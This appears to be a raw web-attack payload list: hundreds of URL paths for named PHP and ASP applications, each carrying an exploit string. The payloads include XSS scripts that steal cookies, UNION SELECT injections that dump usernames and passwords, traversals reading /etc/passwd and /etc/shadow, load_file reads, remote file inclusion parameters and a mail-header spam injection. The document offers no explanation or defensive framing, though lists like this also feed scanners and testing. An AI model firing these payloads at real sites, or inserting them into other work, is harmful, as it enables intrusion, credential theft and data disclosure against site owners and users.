/INDEXU_PATH/register.php?password2=[XSS]
/INDEXU_PATH/register.php?email=[XSS]
/INDEXU_PATH/power_search.php?url=[XSS]
/INDEXU_PATH//power_search.php?contact_name=[XSS]
/INDEXU_PATH//power_search.php?email=[XSS]
/INDEXU_PATH/new.php?path=[XSS]
/INDEXU_PATH//new.php?total=[XSS]
/INDEXU_PATH/mailing_list.php?error_msg=[XSS]
/INDEXU_PATH/mailing_list.php?email=[XSS]
/INDEXU_PATH/login.php?error_msg=[XSS] 
/index.php/>">[xss]
/login.php/>">[xss] 
/index.php?tag=</title><script>alert(document.cookie)</script> 
/psm/admin/memberlist.php?keyword=[SQl]&p=a&by=1&sbmt1=++Search++&init_row=0&sort=create_time&sq=desc&status=1
/psm/admin/edit_member.php?username=Admin=[XSS] 
/path/admin/memberlist.php?keyword=[XSS]&type=1&status=1&by=1&sbmt1=++Search++&accessname=0&init_row=0&sort=create_time&sq=desc
/path/admin/memberlist.php?init_row=[SQL] 
/smf/index.php?action=pm;sa=send 
/board/search.php?keyword=[XSS]
/Board/list3.php?user=[XSS] 
/articles/edit.php/>"><ScRiPt>alert(907810260)%3B</ScRiPt> http
/guestbookv4.0/show.php?user='><script>alert(document.cookie);</script> 
/modules/mail/main.php?MODULES_DIR=shell.txt 
/file.html"
/path-to-a-big-iso-file-from-a-major-linux-distribution.iso#i%d"
/path/php_mm1.4/admin.php?_p=XSS=_approval_users 
/download.php?fname=[SOURCE FILE] 
/rss/show_webfeed.php?wcCategory=0&wcHeadlines=[SQL] 
/index.php?module=News&startrow='[sql injection] 
/encapscms-0.3.6/common_foot.php?config[path]=evilcode? 
/openemr-2.8.2/custom/import_xml.php?srcdir=evilcode 
/openemr/interface/login/login_frame.php?rootdir=[XSS] 
/easymoblog/add_comment.php?i='[SQL]
/easymoblog/img.php?i='[XSS] 
/imap/index.php?lid=en_UK&tid=default&f_user=XSS 
/index.php?chemin=../../../../../../../../../../../../../etc/passwd%00
/mod_news/goodies.php?chemin=../../../../../../../../../../../../../etc/passwd%00
/mod_news/index.php?chemin=http
/mod_news/goodies.php?chemin=http
/index.php?chemin=http
/bridge/enigma/E2_header.inc.php?boarddir=http
/affichearticles.php3?newsenginedir=[attacker] 
/scripts/passwdmysql?password=[xss]&user=root&submit=Change+Password 
/[TagIt_path]/tagviewer.php?configpath=http
/[TagIt_path]/tagviewer.php?adminpath=http
/[TagIt_path]/tag_process.php?configpath=http
/[TagIt_path]/tag_process.php?adminpath=http
/[TagIt_path]/CONFIG/errmsg.inc.php?configpath=http
/[TagIt_path]/tagmin/addTagmin.php?configpath=http
/[TagIt_path]/tagmin/ban_watch.phpp?configpath=http
/[TagIt_path]/tagmin/delTagmin.php?configpath=http
/[TagIt_path]/tagmin/delTag.php?configpath=http
/[TagIt_path]/tagmin/editTagmin.php?configpath=http
/[TagIt_path]/tagmin/editTag.php?configpath=http
/[TagIt_path]/tagmin/manageTagmins.php?configpath=http
/[TagIt_path]/tagmin/verify.php?configpath=http
/[TagIt_path]/tagmin/index.php?adminpath=http
/[TagIt_path]/tagmin/readconf.php?admin=http
/[TagIt_path]/tagmin/updateconf.php?admin=http
/[TagIt_path]/tagmin/updatefilter.php?admin=http
/[TagIt_path]/tagmin/wordfilter.php?admin=http
/wordpress/wp-admin/templates.php?action=update&file=<script>alert("Faille Xss")</script>&submit=Update+File+%C2%BB
/webtester/directions.php?testID=\' 
/forum/arcade.php?act=Arcade%20search_type=0&gsearch=' union select password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 from user where userid = USERID /* 
/dp/faq.php?article=[xss] 
/cedstat/index.php?hier=%3C%68%31%3E%74%65%73%74%65%64%20%62%79%20%73%6E%30%6F%50%79%3C%2F%68%31%3E 
/path/include.php?_SERVER[DOCUMENT_ROOT]=[shell] 
/ezwebstats/update.php
/ezwebstats/config.php
/admin/.js
/calendar/index.php?go="><script>alert(document.cookie)</script> 
/cedstat/index.php?hier=%3C%68%31%3E%74%65%73%74%65%64%20%62%79%20%73%6E%30%6F%50%79%3C%2F%68%31%3E 
/phpTrafficA/plotStat.php?file=/../../../../../../../../../etc/passwd
/phpTrafficA/banref.php?lang=/../../../../../../../../../etc/passwd%00 
/news.php?GLOBALS[]=1&link_parameters="><script>alert(document.cookie);</script>
/n_layouts.php?link_parameters="><script>alert(document.cookie);</script> 
/modules/out.php?id=[xss]
/pyrophobia/?act=../../../../../../../../../../../../file.ext00
/pyrophobia/?pid=../../../../../../../../../../../../file.ext%00
/pyrophobia/admin/index.php?action=../../../../../../../../../../../../../file.ext%00 
/zadminxx/list_main_pages.php?nfolder=/etc/
/edit.php?em=file&filename=../../../../../../../../../../../../../etc/passwd 
/lovecms/install/index.php?step=http
/lovecms/install/index.php?step=/etc/passwd%00
//ovecms/?load=../../../../../../../../../../etc/passwd%00
/lovecms/?load=content&id=[xss] 
/shopkitplus/enc/stylecss.php?changetheme=../../../../../../../../../../../../etc/passwd 
/index.php?currency=EUR&manufacturers_id=1&template=../../../../../../../../etc/passwd%00 
/gallery.php?f=../../../../../../../../../../../../etc/passwd
/gallery.php?f=[xss]
/Pickle/src/download.php?img=1&file=../../../../../../../../../../../../../etc/shadow&rotation=0&img=0 
/activecalendar/data/showcode.php?page=../../../../../../../../../../../../../../etc/passwd%00 
/activecalendar/data/flatevents.php?css="><script>alert(document.cookie)</script>
/activecalendar/data/js.php?css="><script>alert(document.cookie)</script> 
/activecalendar/data/m_2.php?css="><script>alert(document.cookie)</script>
/activecalendar/data/m_3.php?css="><script>alert(document.cookie)</script>
/activecalendar/data/m_4.php?css="><script>alert(document.cookie)</script>
/activecalendar/data/y_2.php?css="><script>alert(document.cookie)</script>
/activecalendar/data/y_3.php?css="><script>alert(document.cookie)</script>
/activecalendar/data/mysqlevents.php?css="><script>alert(document.cookie)</script>
/index.php?page=search&q=<script>alert(document.cookie)</script> 
/doceboCms/index.php?searchkey=<script>alert('Bella_Italia');</script>
/doceboScs/modules/htmlframechat/index.php?sn=<script>alert('Bella_Italia');</script> http
/index.php?read=../admin/a_searchu.php 
/[path]/unistall.php?cnf=disinstalla&status=on
/[path]/setup.php/>"><ScRiPt>alert('Bella_Italia')%3B</ScRiPt> 
/[path]/system/index.php with PHPSESSID = '
//www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <body> <form id="editform" name="editform" method="post" action="http
/index.php?module=Pagesetter&type=file&func=preview&id=../../../../../../../../../etc/passwd%00 
/wp-admin/comment.php?action=deletecomment&p=39&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http
/[aWebNewsPaTh]/listing.php?path_to_news=[Shell]
/[path]/news.php?cid=[Xss-Script]
/[path]/news.php?uid=[Xss-Script]
/[path]/rating.php?nid=[Xss-Script] http
/wp-includes/feed.php?ix=phpinfo();
/wp-includes/theme.php?iz=cat /etc/passwd 
/ViewBugs.php?s=[sql]&o=ASC
/Login.php/>">[XSS]
/Register.php/>">[XSS] 
/Path_Script/createurl.php?formurl=[Shell-Attack] 
/[path]/includes/functions_kb.php?phpbb_root_path=[Shell-Attack]
/[path]/includes/themen_portal_mitte.php?phpbb_root_path=[Shell-Attack]
/[path]/includes/logger_engine.php?phpbb_root_path=[Shell-Attack] 
/engine/init.php?root_dir=[Shell-Attack]
/engine/Ajax/editnews.php?root_dir=[Shell-Attack]k] 
/xss.html" />
/Path/include/adodb-connection.inc.php?cmd=[Shell-Attack] 
/[path]/check_vote.php?order=../../../../etc/passwd 
/horde/imp/search.php?edit_query=[xss] 
/index.php?modpath=http
/horde/[Horde_App]/login.php?new_lang=[xss] 
/CMD_USER_STATS?RESULT='http
/enkrypt.php?datei=../../../../etc/passwd 
/phpx/print.php?action=news&news_id='
/phpx/forums.php?cat_id='
/phpx/forums.php?forum_id=1&topic_id='
/phpx/forums.php?forum_id=1&topic_id=1&post_id='
/phpx/users.php?action=view&user_id='
/phpx/gallery.php?action=viewCat&cat_id='
/w-agora/profile.php?site=hello&showuser='"><script>alert(document.cookie)</script>
/w-agora/search.php?bn=hello_hello&gosearch=1&pattern=1&search_date=0&search_fields[body]=1&search_fields[ subject]=1&search_forum=hello_hello&search_mode=0&search_user='"><script>alert(document.cookie)</script>
/w-agora/change_password.php?newpasswd1=1&newpasswd2=1&passwd=1&site=hello&userid='"><script>alert(documen t.cookie)</script> 
/contact.php?AD_BODY_TEMP=http
/login.php?AD_BODY_TEMP=http
/register.php?AD_BODY_TEMP=http
/imageupload_path/login.php?AD_BODY_TEMP=Shell?
/imageupload_path/frontpage.php?AD_BODY_TEMP=Shell?
/imageupload_path/forgot_pass.php?AD_BODY_TEMP=Shell? 
/cccounter_path/index.php?option=browser&dir=%3Cscript%3Ealert(/Crackers_Child/)%3C/script%3E 
/search?q="/><script>window.location="http
/nuke_path/Satellite.php?op=modload&name=../../../../../../etc/passwd&file=index
/path/404.php?d_private=../../etc/passwd? 
/path/index.php?page=[XSS] 
/upload/auth.php?ts_username=indoushka&forward_to=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&fn=login&ts_password=hacked&remember=on
/ubbthreads.php?Cat=cat&C=' 
/?msg=[XSS] 
/include/blocks/week_events.php?myNewsConf[path][sys][index]=[REMOTEFILE]? 
/dotclear/ecrire/trackback.php?post_id=[XSS]
/tools/thememng/index.php?tool_url=[XSS] 
/Path/admin/index.php?page=template&modify=../../../../../../etc/passwd
/Path/admin/index.php?page=template&modify=inc/config.ini.php 
/[path]/iklan.php?m_txt=[xss]
/[path]/index.php?m_txt=[xss]
/[path]/bukutamu.php?m_txt=[xss] 
/[path]/index.php?msg=<script>alert(/the_Edit0r/);</script>
/[path]/index.php?msg=<script>alert(/the_Edit0r/);</script>
/path/index.php?page=forum
/path/?page=vdasCMS
/path/index.php?page=photos
/path/index.php?page=[XSS] example 
/[path]/plugins/spaw/img_popup.php?img_url=<script>alert(/the_Edit0r/);</script> 
/[path]/cas.php?rok=<script>alert(/the_Edit0r/);</script> 
/[script path]/actionpoll.php?CONFIG_POLLDB=http
/[path]/showpic.php?pic=[xss]
/[path]/showpic.php?gal=[xss] 
/nuke/?%2f*
/html80/?%2f**/UNION%2f**/SELECT 
/groups.php?g=1+and+1=0
/external/magpierss/scripts/magpie_debug.php?url=<script> alert(document.cookie) </script>
/external/magpierss/scripts/magpie_slashbox.php?rss_url=<script> alert(document.cookie) </script>
/iconspopup.php?icodir=/../../../
/user/turbulence.php?GLOBALS[tcore]=http
/you.php?user=[xss] 
/path/contact/index.php" method="post">
/[path]/admin/setup/level2.php?dir=[EvilScript] 
/includes/init.inc.php?base_path=Shell 
/html/php/detail.php?relPath=[shell]?
/html/php/detail.php?folder=[shell]? 
//john-martinelli.com">John Martinelli</a><br><br>Google d0rk
/inc_ACVS/SOAP/Transport.php?CheminInclude=Shell 
//claroline/inc/lib/rootSys=Shell 
/modules/rtmessageadd.php?_LIB_DIR=Shell? 
/[path]/showpic.php?pic=[xss]
/[path]/showpic.php?gal=[xss] 
/login.php3?login_name=x&passwd=x&locale_id=../../../../../../../../boot.ini%00.jpg
/include.php?myng_root=http
/addvip.php?msetstr["PROGSDIR"]=http
/page.php?fp=r57shell?
/page.php?sc=r57shell? 
/b2archives.php?b2inc=http
/b2categories.php?b2inc=http
/b2mail.php?b2inc=http
/accept.php?DOCUMENT_ROOT=http
/include/payment/payflow_pro.php?abs_path=http
/inc/libs/Smarty_Compiler.class.php?plugin_file=http
/_editor.php?settings[app_dir]=http
/DynaTracker_v151/includes_handler.php?base_path=http
/DynaTracker_v151/action.php?base_path=http
/apb.php?APB_SETTINGS['apb_path']=http
/[path]/info.php?file=http
/action=AttachFile&do=<script src=http
/home.php?a='/**/UNION/**/SELECT/**/0,password,1,2,3,4,6/**/FROM/**/user/**/WHERE/**/user_id=1/* 
/stylesheet.php?templateid=16+AND+1=1
/stylesheet.php?templateid=16+AND+1=0 
/[path]noah/modules/noevents/templates/mfa_theme.php?tpls[1]=[shell] 
/modules/wfquotes/index.php?op=cat&c=1/**/UNION/**/SELECT/**/0,uname,pass,3,4,5/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*
/picture.php?size[0]=1&size[1]=1&img=1&picture=[xss] 
/classes/Alias.php?g_DocumentRoot=shell.txt?
/classes/Article.php?g_DocumentRoot=shell.txt?
/classes/ArticleAttachment.php?g_DocumentRoot=shell.txt?
/classes/ArticleComment.php?g_DocumentRoot=shell.txt?
/classes/ArticleData.php?g_DocumentRoot=shell.txt?
/classes/ArticleImage.php?g_DocumentRoot=shell.txt?
/classes/ArticleIndex.php?g_DocumentRoot=shell.txt?
/classes/ArticlePublish.php?g_DocumentRoot=shell.txt?
/classes/ArticleTopic.php?g_DocumentRoot=shell.txt?
/classes/ArticleType.php?g_DocumentRoot=shell.txt?
/classes/ArticleTypeField.php?g_DocumentRoot=shell.txt?
/classes/Country.php?g_DocumentRoot=shell.txt?
/classes/DatabaseObject.php?g_DocumentRoot=shell.txt?
/classes/Event.php?g_DocumentRoot=shell.txt?
/classes/IPAccess.php?g_DocumentRoot=shell.txt?
/classes/Image.php?g_DocumentRoot=shell.txt?
/classes/Issue.php?g_DocumentRoot=shell.txt?
/classes/IssuePublish.php?g_DocumentRoot=shell.txt?
/classes/Language.php?g_DocumentRoot=shell.txt?
/classes/Log.php?g_DocumentRoot=shell.txt?
/classes/LoginAttempts.php?g_DocumentRoot=shell.txt?
/classes/Publication.php?g_DocumentRoot=shell.txt?
/classes/Section.php?g_DocumentRoot=shell.txt?
/classes/ShortURL.php?g_DocumentRoot=shell.txt?
/classes/Subscription.php?g_DocumentRoot=shell.txt?
/classes/SubscriptionDefaultTime.php?g_DocumentRoot=shell.txt?
/classes/SubscriptionSection.php?g_DocumentRoot=shell.txt?
/classes/SystemPref.php?g_DocumentRoot=shell.txt?
/classes/Template.php?g_DocumentRoot=shell.txt?
/classes/TimeUnit.php?g_DocumentRoot=shell.txt?
/classes/Topic.php?g_DocumentRoot=shell.txt?
/classes/UrlType.php?g_DocumentRoot=shell.txt?
/classes/User.php?g_DocumentRoot=shell.txt?
/classes/UserType.php?g_DocumentRoot=shell.txt?
/configuration.php?g_DocumentRoot=shell.txt?
/db_connect.php?g_DocumentRoot=shell.txt?
/priv/localizer/LocalizerConfig.php?g_DocumentRoot=shell.txt?
/priv/localizer/LocalizerLanguage.php?g_DocumentRoot=shell.txt? 
/../../../hack_www/htdocs/hack 
/web/configure_plugin.tpl.php?edit_plugin==[xss] 
/path-to-eqdkp/listmembers.php?show=%22%3E%3Cplaintext%3E 
/search.php?query=1&part=[xss] 
/path/search.php?query=1&part=post`<> '' UNIoN SELECT `id`,`password`,1,1,1,1,`username` FROM `users` WHERE id=1/*&by=*/
/path/viewforum.php?id=1' UNION SELECT `id`,`password`,1,1,1,1,1 FROM `users` WHERE id=1%23 
/wp-admin/plugins.php?page=akismet-key-config" method="post" id="akismet-conf"> <input name="_wpnonce" value="'" type="text"> <input name="_wp_http_referer" value="'%2522><script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105 ,101,41))</script>" type="text"> <input id="key" name="key" size="15" maxlength="12" value="1337"> <input name="submit" value="Update options »" type="submit"> </form> </body> </html> 
/[JETBOX-DIRECTORY formmail.php?recipient=spam1@somedomain.com&_SETTINGS[allowed_email_hosts][]=somedomain.com&subject=Some Spam Subject%0ABcc
/jetbox/index.php/view/search/?path=[xss]
/jetbox/index.php/view/supplynews/?companyname=[xss] 
/jetbox/index.php/view/supplynews/?companyname=1&country=[xss] 
/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=[xss] http
/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=1&firstname=1&middlename=1&recipient=jetbox@www.example2.com&require[xss] 
/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=1&firstname=1&middlename=&recipient=jetbox@www.example2.com&required=firstname,surname,email,companyname,country,workphone,title,topic,website,text&signupsubmit=true&subject=News&submit=Send&surname=[xss] 
/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=1&firstname=1&middlename=1&recipient=jetbox@www.example2.com&required=firstname,surname,email,companyname,country,workphone,title,topic,website,text&signupsubmit=true&subject=News&submit=Send&surname=1&text=1&title=[xss] 
/vbulletin/calendar.php?do=add&type=single&c=1
/[path]/server.php?newcss=styles.css&newtheme=%00 
/[path]/index.php?ticketID=[xss]
/[path]/index.php?view=[xss]
/[path]/index.php?fuse=[xss] 
/hlstats/hlstats.php/>"><script>alert(1)</script> http
/path/index.php" method="post">
/path//index.php?view=-1' UNION SELECT 1,CONCAT(`login`,'-',`user_password`),1,1,1,1,1,1,1,1,1,1 FROM `User` LIMIT 0,1%23
/path//index.php?view=webuser&task=sendpw&login=-1' UNION SELECT 1,1,1,'spam1@mail.com%0ABcc
/product/index.php?view=webuser&task=sendpw&login=<script>alert(document.cookies)</script> 
/[path]/sample/xls2mysql/parser_path=shell.txt? 
/psychostats/weapons.php/>"><script>alert(1)</script> 
/path/showown.php?st=XSS 
/phpPgAdmin/sqledit.php?server=[xss] 
/index.php?Page=Sayfa&No="><script>alert(document.cookie)</script>
/2zcms/?category=none&altname=testnews&rating=xxx 
/news.asp?id="><script>alert("Vagrant")</script>
/room/info_book.asp?Room_name='><script>alert(1);</script> http
/login.php?processlogin=4&username=admin&confirmationcode=1234567891e2f566cbda0a9c855240bf21b8bae030404cad7 
/redirect.php/%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E?subject=server&server=test 
/chat/incclasses/connection.php?f_cms=[Shell-Attack]
/chat/inc/common.php?f_cms=[Shell-Attack]
/footer.php?copyright=[xss] 
/news.php?go=newslist&catid=' UNION SELECT 1,`site_title` FROM `news_config` WHERE '1 
/demo/pop3/error.php?selected_theme=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/demo/pop3/error.php?smarty=test 
/demo/pop3/error.php?selected_theme=test
/news.php?go=fullnews&newsid=-9+union+select+1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),4,5,6,7%20from%2
/news.php?go=fullnews&newsid=-9+union+select+1,2,load_file(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F64676E657
/cpcommerce/manufacturer.php?id_manufacturer=-9/**/union/**/select/**/pass,LOAD_FILE(0x2F6574632F706173737764),0/**/from/**/cpAccounts/* 
/apppath/archives.php?year=2007&month=' 
/apppath/search.php?user=admin&order=>"><ScRiPt%20%0a%0d>alert(1111110)%3B</ScRiPt> 
/apppath/index.php?mode=viewuser&cat_id='
/apppath/index.php?mode=viewuser&month_no=4&year=" 
/PHPJK/G_Display.php?iCategoryUnq=-1/**/union/**/select/**/1,2,Password,4,5,6/**/from/**/Accounts/*
/PHPJK/G_Display.php?iCategoryUnq=-1/**/union/**/select/**/1,2,LOAD_FILE(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F5048504A4B2F436F6E66696
/PHPJK/Search/DisplayResults.php?DOMAIN_Link=&iSearchID=-1+UNION+SELECT+1,1,1,1,Login,1,Password,1,1,1,1,1,1,1+FROM+Accounts/*
/PHPJK/UserArea/Authenticate.php?sUName=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
/PHPJK/UserArea/NewAccounts/index.php?sAccountUnq=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
/PHPJK/G_Display.php?iCategoryUnq=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
/PHPJK/G_Display.php?iDBLoc=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
/PHPJK/G_Display.php?iTtlNumItems=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
/PHPJK/G_Display.php?&iNumPerPage=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
/PHPJK/G_Display.php?sSort=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
/index.php?title=%3Cscript%3Ealert(1)%3C/script%3E
/includes/send.inc.php/>'>><script>alert(document.cookie)</script> 
/phplive/chat.php?sid=<script>alert(123);</script>
/phplive/help.php?LANG[DEFAULT_BRANDING]=<script>alert(123);</script> http
/phplive/admin/header.php?admin[name]=<script>alert(123);</script>
/phplive/super/info.php?BASE_URL=<script>alert(123);</script>
/phplive/setup/footer.php?LANG[DEFAULT_BRANDING]=<script>alert(123);</script>
/phplive/setup/footer.php?PHPLIVE_VERSION=<script>alert(123);</script> http
/index.php?cat=[xss] 
/index.php?pages=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(document.cookie)%3B%3C/ScRiPt%3E http
/?pageid=[XSS] 
/?pageid=[XSS] 
/?pageid=[XSS] 
/?pageid=-->[XSS] 
/?pageid=email@address.com[XSS]domain.com 
/?pageid=[XSS] 
/index.php?pageid=>'>[XSS] 
/index.php?pageid=[XSS] 
/index.php?pageid=[XSS] 
/index.php?pageid=-->[XSS] 
/index.php?pageid=email@address.com[XSS]domain.com 
/index.php?pageid=[XSS] 
/apppath/diary.php?month=06&year=2007&day=01&delete=%27 http
/apppath/diary.php?Sec=diary&month=06&year=</title><ScRiPt%20%0a%0d>alert(123123123)%3B</ScRiPt>&day=01 
/components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=
/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path= 
/atomphotoblog/atomPhotoBlog.php?do=index&tag=<ScRiPt%20%0a%0d>alert(1566213939)%3B</ScRiPt> 
/4print.asp?p=60&sbl=>">[XSS]
/4print.asp?p=60&sbr=>">[XSS]
/wp-admin/themes.php?page=functions.php&zmx"><script>alert(1)</script>
/4/vBSupport.php?do=showticket&ticketid=[SQL] 
/forum/links.php?webtag=FORUM_NAME&fid=1&viewmode=>".><script>alert(1);</script> http
/auth.php?user='%20union%20select%202,'admin','$1$RxS1ROtX$IzA1S3fcCfyVfA9rwKBMi.','Administrator'/*&pass=
/auth.php?user=[xss]
/index.php?option=com_letterman&task=view&id=1&Itemid=1"><script>alert(String.fromCharCode(88,83,83))</script>
/[WSPORTAL-DIRECTORY]/content.php?page=0' UNION SELECT `username`,`password` FROM `users` WHERE '1 
/app_path/index.php/%3E%22%3E%3CScRiPt%3Ealert(1234)%3C/ScRiPt%3E 
/path/low.php?action=log&fromforum=111-222-1933email@address.com&fromtopic=111-222-1933email@address.com&fromaction=>"><ScRiPt%20%0a%0d>alert(21 407654)%3B</ScRiPt> 
/wrapper.php?file=../../../../etc/passwd 
/index.php?page=../../etc/passwd 
/path/index.php?Outgoing_Type_ID=[SQL INJECTION]
/path/index.php?Outgoing_ID=[SQL INJECTION]
/path/index.php?Project_ID=[SQL INJECTION]
/path/index.php?Client_ID=[SQL INJECTION]
/path/index.php?Invoice_ID=[SQL INJECTION]
/path/index.php?Vendor_ID=[SQL INJECTION] 
/ViewCat.php?CatID=-8+union+select+1,email,3+from+users/*
/ViewCat.php?s_user_id='+union+select+user_password+from+users+where%20user_id=1/* 
/mod.php?mod=katalog&op=viewlink&cid=-1+union+select+1,pwd,3+from+authors/*
/mod.php?mod=katalog&op=viewlink&cid=-1+union+select+1,LOAD_FILE(0x2F6574632F706173737764),3+from+authors/*
/mod.php?mod=diskusi&op=viewdisk&did=-9+union+select+1,2,aid,pwd,5,6,email+from+authors/*
/mod.php?mod=publisher&op=viewarticle&cid=2&artid=-9+union+select+1,2,3,4,5,pwd,aid,email,9,0+from+authors/*
/mod.php?mod=publisher&op=printarticle&artid=-47+union+select+1,concat_ws%280x3a,aid,name,pwd%29,3,4,5,6,7+from+authors--
/banners.php?op=click&bid=-9+union+select+pwd+from+authors/*
/components/com_forum/download.php?phpbb_root_path=[Shell] 
/[PRODUCT-DIRECTORY]/calendar.php?year=<script>alert(document.cookies)</script> http
/calendar.php?month=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23
/calendar.php?month=&year=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23 
/interna/plugin.php?template=devtools/templates/newdump_backend.html 
/open.php?err=[xss]
/open.php?warn=[xss]
/app_path/add_comment.php?id=[XSS] 
/index.php?[XSS] 
/user/index.php?contextid=4&roleid=0&id=2&group=&perpage=20&search=%22style=xss
/config.inc 
/maia/login.php?lang=../../../../../../../../../../../../../var/log/httpd-error.log%00.txt 
/alert.php?reminder=-->//"><script>alert(/XSS_vulnerability_proventia_s0x by Alex Hernandez/);</script>
/index.php?title=http
/main.php?page=https
/search/?q=[XSS] 
/admin/index.php
/scriptpath/templates/header.php?int_path=http
/scriptpath/templates/footer.php?int_path=http
/scriptpath/templates/secure.admin.php?int_path=http
/showuser?who=[xss] 
/index.php?current_subsection=2 or 1=1/*
/index.php?current_subsection=2%20union%20all%20select blah from content/*
/blog/admin/deletecomment.php?id=16
/blog/admin/deleteblog.php?id=15
/UseBB/install/upgrade-0-2-3.php/"><ScRiPt>alert(document.cookie);</ScRiPt>
/UseBB/install/upgrade-0-3.php/"><ScRiPt>alert(document.cookie);</ScRiPt>
/resources/function_list.php?action=[Local Script]%00
/admin/membersearch.php?pagina=17&q=la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
/admin/membersearch.php?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&B1=Submit 
/admin/edituser.php?userid=Walltrapas"><script>alert()</script> 
/affiliate/merchants/index.php?
/affiliate/merchants/index.php?Act=
/affiliate/merchants/index.php?Act= ProgramReport&programs=All&err=Please%20Enter%20Valid%20Date "><script>alert()</script>
/affiliate/merchants/index.php?Act= add_money&msg=Please%20Enter%20A%20valid%20amount"><script>alert()</script> &modofpay=Authorize.net&bankname=&bankno=& bankemail=&bankaccount=&payableto=&minimumcheck=&affiliateid= 
/affiliate/merchants/temp.php?rowid= 5"><script>alert()</script>
/affiliate/merchants/index.php?Act= uploadProducts&pgmid=41%20or%201=1
/uploader/?page=<script>alert(document.cookie)</script>
/scripts/passwdmysql?password=[xss]&user=root&submit=Change+Password 
/viking/cp.php?mode=9&id=2[XSS-CODE]
/viking/cp.php?mode=7&f=1[XSS-CODE]
/viking/cp.php?mode=6"e=1[XSS-CODE]
/viking/cp.php?mode=12&act=[XSS-CODE]
/viking/user.php?u=2[XSS-CODE]
/viking/post.php?mode=00&f=1[XSS-CODE]&poll=0
/viking/post.php?mode=03&t=2"e=2[XSS-CODE]
/viking/post.php?mode=03&t=2[XSS-CODE]"e=2
/viking/post.php?mode=00&f=1&poll=0[XSS-CODE]
/viking/post.php?mode=02&p=2[XSS-CODE] 
/viking/topic.php?t=2&s=0[XSS-CODE]
/viking/forum.php?f=1&debug=1
/viking/cp.php?mode=10&debug=1 
/ifoto/?dir=..%2F..%2F..%2F..%2F..%2F..%2Fetc
/ifoto/?dir=../../../../../../etc
/ifoto/index.php?dir=../../../../../../ 
/library/authorize.php?login_form=http
/_wp1/?feed=rss2&<script>alert(1)</script> 
/index.php?date=[SQL]
/index.php?limit=[SQL] 
/path/user.php?REQ=auth&billing=141&status=success&custom=upgrade5
/lang-en.php?wndtitle=[Xss-script]
/menu-ed.php?wndtitle=[Xss-script]
/titletext-ed.php?wndtitle=[Xss-script] 
/index.php?Madoa=http
/vote.php?Madoa=http
/admin.php?Madoa=http
/index.php?deslocal=[xss] 
/administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path= 
/module.php?modname=faq&mf=faqviewgroup&mid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,userLogin,userPassword,5,6,7/**/FROM/**/tbl_ln_user/*
/module.php?modname=ezshopingcart&ac=c&cid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,concat(userLogin,'-',userPassword),4,5/**/FROM/**/tbl_ln_user/*
/module.php?modname=gallery&mf=view&gid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,userLogin,userPassword,4/**/FROM/**/tbl_ln_user/* 
/administrator/components/com_jreactions/langset.php?comPath=Evil? 
/index.php?path=[xss]
/index.php?download=[xss] 
/_functions.php?dirpath=Sh3LL 
/path/admin/index.php?language=Sh3LL
/index.php??language=Sh3LL
/path/bridge/yabbse.inc.php?sourcedir=[Sh3LL] 
/index.php?config[root_ordner]=http
/index.php?config[root_ordner]=http
/datei.php?config[root_ordner]=http
/shoutbox.php?root=http
/index.php?config[root_ordner]=http
/index.php?config[root_ordner]=http
/feed.php?config[root_ordner]=http
/news.php?config[root_ordner]=http
/adm/my_statistics.php?DOCUMENT_ROOT=http
/php-stats-path/whois.php?IP=[XSS] 
/libraries/lib-remotehost.inc.php?phpAds_geoPlugin=EviL ShEll 
/index.php?mode=showbyID&jobid=99786'%20union%20all%20select%20something%20from%20something/*
/index.php?mode=showbyID&jobid=99786'%20or%201=1/*
/index.php?mode=showbyID&jobid=99786'%20order%20by%2016/* 
/depouilg.php3?NomVote=http
/depouilg.php3?FilePalHex=http
/forum/forumreply.php?chemin=../../../../etc/passwd 
/path/includes/class/class_tpl.php?cache_file=http
/uyeler2.php?id=-1%20union+select+0,kadi,2,id,sifre,5,6,7,8,9,10,11+from+uyeler 
/?cmd=srchdoc&q=[XSS] 
/?go=[XSS] 
/index.php/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/index.php?loadpage=[evilscript]
/AutoIndex/index.php?search=asdf&search_mode=[xss] 
/viewevent.php?id=-1' union select 1,load_file('/etc/passwd'),1,1/* 
/genealogy/login.php?action=login&username=[xss] 
/index.php?menu=showarticle&aid=[SQL INJECTION]
/index.php?menu=showarticle&aid=-3 UNION ALL SELECT 1,@@version,3,4,5,user(),7
/index.php?menu=showcat&catid=[SQL INJECTION]
/index.php?menu=showcat&catid=-3 UNION ALL SELECT 1,@@version 
/form.php?action=show&homepage=[XSS]&mail=[XSS]&name=[XSS]
